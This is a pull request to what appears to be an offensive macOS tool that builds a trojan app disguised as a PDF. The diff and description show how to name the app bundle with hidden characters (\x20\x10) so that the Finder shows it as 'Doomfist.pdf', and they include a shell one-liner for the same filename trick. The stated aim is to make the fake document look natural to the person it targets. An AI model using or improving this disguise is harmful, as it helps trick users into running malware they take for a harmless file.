### PR TITLE
Update PDF.py

### DIFF
--- a/Modules/PDF.py
+++ b/Modules/PDF.py
@@ -1,5 +1,6 @@
 # https://null-byte.wonderhowto.com/how-to/hacking-macos-create-fake-pdf-trojan-with-applescript-part-2-disguising-script-0184706/
 import os
+import shutil
 import asyncio
 from .Utilities import *
 
@@ -34,7 +35,11 @@ def pdf():
         shutil.copyfile(payload + "/applet.icns", payload + "/test.app/Contents/Resources/applet.icns")
         shutil.copyfile(payload + "/Info.plist", payload + "/test.app/Contents/Info.plist")
 
-        os.system("cp -r Payloads/PDF_Payload/test.app Payloads/PDF_Payload/Doomfist.pdf..app")
+        #os.system("cp -r Payloads/PDF_Payload/test.app Payloads/PDF_Payload/Doomfist.pdf..app")
+
+        a = "Payloads/PDF_Payload/Doomfist.pdf" + bytes.fromhex('20').decode('utf-8') + bytes.fromhex('10').decode('utf-8') + ".app"
+        shutil.copytree("Payloads/PDF_Payload/test.app", a)
+        
 
         print("[+] Built PDF as Doomfist.pdf.")
         print("Notes: \n"


### PR DESCRIPTION
The generated file indeed appears to be in PDF format; however, it contains an extra period at the end that may catch the user's attention. For instance, if you name it "mystikal.pdf..app" it will display as "mystikal.pdf." which may seem unusual.

A more refined solution is available. When naming the file, utilize the \x20\x10 character sequence, as demonstrated below:
`a=$(echo -n "mystikal.pdf\x20\x10.app"); mv mystikal.app $a`

This approach ensures that the file presents itself as "mystikal.pdf" presenting a more natural and expected appearance to the user.

References: 
- https://www.youtube.com/watch?v=jMKtlS9H_TQ
- https://blog.xpnsec.com/macos-phishing-tricks/
- https://www.mdsec.co.uk/2019/12/macos-filename-homoglyphs-revisited/